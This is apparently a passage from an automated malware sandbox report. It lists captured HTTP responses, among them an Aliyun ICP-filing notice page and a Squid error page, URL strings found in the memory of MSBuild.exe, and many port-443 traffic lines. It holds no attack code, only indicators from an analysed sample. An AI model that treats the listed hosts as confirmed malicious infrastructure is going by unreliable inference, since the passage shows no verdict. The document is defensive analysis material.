66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/5.5Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:16:36 GMTContent-Type: text/html;charset=utf-8Content-Length: 3712X-Squid-Error: ERR_CONNECT_FAIL 110Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30
                Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.2.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: qmgr.db.2.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: MSBuild.exe, 00000010.00000002.2879177243.0000000006520000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: MSBuild.exe, 00000010.00000002.2800783288.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://terminal7.veeblehosting.com
                Source: MSBuild.exe, 00000010.00000002.2686476094.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                Source: svchost.exe, 00000002.00000003.2102220606.000001E8EC3D3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                Source: svchost.exe, 00000002.00000003.2102220606.000001E8EC360000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.2.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: qmgr.db.2.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                Source: unknownNetwork traffic detected: HTTP traffic on port 61465 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58810 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58535 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56039
                Source: unknownNetwork traffic detected: HTTP traffic on port 57404 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60538
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60537
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60536
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60535
                Source: unknownNetwork traffic detected: HTTP traffic on port 62390 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 50360 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50504
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50505
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56052
                Source: unknownNetwork traffic detected: HTTP traffic on port 53717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54494 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51524 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50359 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                Source: unknownNetwork traffic detected: HTTP traffic on port 56125 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63279 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50511
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56066
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60793
                Source: unknownNetwork traffic detected: HTTP traffic on port 64008 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60799
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50524
                Source: unknownNetwork traffic detected: HTTP traffic on port 54151 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56227 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62411 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58914 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65072 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 58809 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 55292 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51192 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49301
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50934
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50937
                Source: unknownNetwork traffic detected: HTTP traffic on port 50591 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50939
                Source: unknownNetwork traffic detected: HTTP traffic on port 52130 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57222 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65127 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63267 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50941
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50946
                Source: unknownNetwork traffic detected: HTTP traffic on port 62812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56229 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53032 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62251 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59243 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62494 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59765
                Source: unknownNetwork traffic detected: HTTP traffic on port 63576 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50949
                Source: unknownNetwork traffic detected: HTTP traffic on port 56031 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56536 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50952
                Source: unknownNetwork traffic detected: HTTP traffic on port 52825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59767
                Source: unknownNetwork traffic detected: HTTP traffic on port 63403 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50950
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59774
                Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56024
                Source: unknownNetwork traffic detected: HTTP traffic on port 50695 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59771
                Source: unknownNetwork traffic detected: HTTP traffic on port 50865 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59382 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51298 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56028
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56033
                Source: unknownNetwork traffic detected: HTTP traffic on port 62686 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54094
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56030
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56031
                Source: unknownNetwork traffic detected: HTTP traffic on port 65348 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                Source: unknownNetwork traffic detected: HTTP traffic on port 51201 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52514
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53609
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50570
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50572
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53600
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50577
                Source: unknownNetwork traffic detected: HTTP traffic on port 49207 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61468
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61460
                Source: unknownNetwork traffic detected: HTTP traffic on port 52538 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61465
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59390
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63403
                Source: unknownNetwork traffic detected: HTTP traffic on port 62816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50505 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64430 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62289 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57625 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52521
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50587
                Source: unknownNetwork traffic detected: HTTP traffic on port 53956 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56219 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50591
                Source: unknownNetwork traffic detected: HTTP traffic on port 51213 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56127 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59163
                Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50359
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52538
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
                Source: unknownNetwork traffic detected: HTTP traffic on port 56150 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50592
                Source: unknownNetwork traffic detected: HTTP traffic on port 59639 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50596
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50357
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50598
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
                Source: unknownNetwork traffic detected: HTTP traffic on port 55787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50360
                Source: unknownNetwork traffic detected: HTTP traffic on port 63265 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53639
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54726
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55810
                Source: unknownNetwork traffic detected: HTTP traffic on port 62906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51211
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                Source: unknownNetwork traffic detected: HTTP traffic on port 55099 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53129 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51213
                Source: unknownNetwork traffic detected: HTTP traffic on port 56827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65160 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60264 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57177
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57178
                Source: unknownNetwork traffic detected: HTTP traffic on port 52514 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59390 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57188
                Source: unknownNetwork traffic detected: HTTP traffic on port 62684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53639 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49366
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49365
                Source: unknownNetwork traffic detected: HTTP traffic on port 65334 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62253 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 58802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49359
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50567
                Source: unknownNetwork traffic detected: HTTP traffic on port 55089 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51899
                Source: unknownNetwork traffic detected: HTTP traffic on port 62287 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62369 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49350
                Source: unknownNetwork traffic detected: HTTP traffic on port 53034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62474 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50565
                Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59385
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59384
                Source: unknownNetwork traffic detected: HTTP traffic on port 51211 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59382
                Source: unknownNetwork traffic detected: HTTP traffic on port 62624 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61192
                Source: unknownNetwork traffic detected: HTTP traffic on port 56142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61195
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55745
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52479
                Source: unknownNetwork traffic detected: HTTP traffic on port 50858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55743
                Source: unknownNetwork traffic detected: HTTP traffic on port 65352 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65111 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54006 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61185
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64453
                Source: unknownNetwork traffic detected: HTTP traffic on port 63171 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64451 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62290
                Source: unknownNetwork traffic detected: HTTP traffic on port 59247 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51301 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54669
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54668
                Source: unknownNetwork traffic detected: HTTP traffic on port 59683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65329 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53583
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54670
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62287
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62288
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62289
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
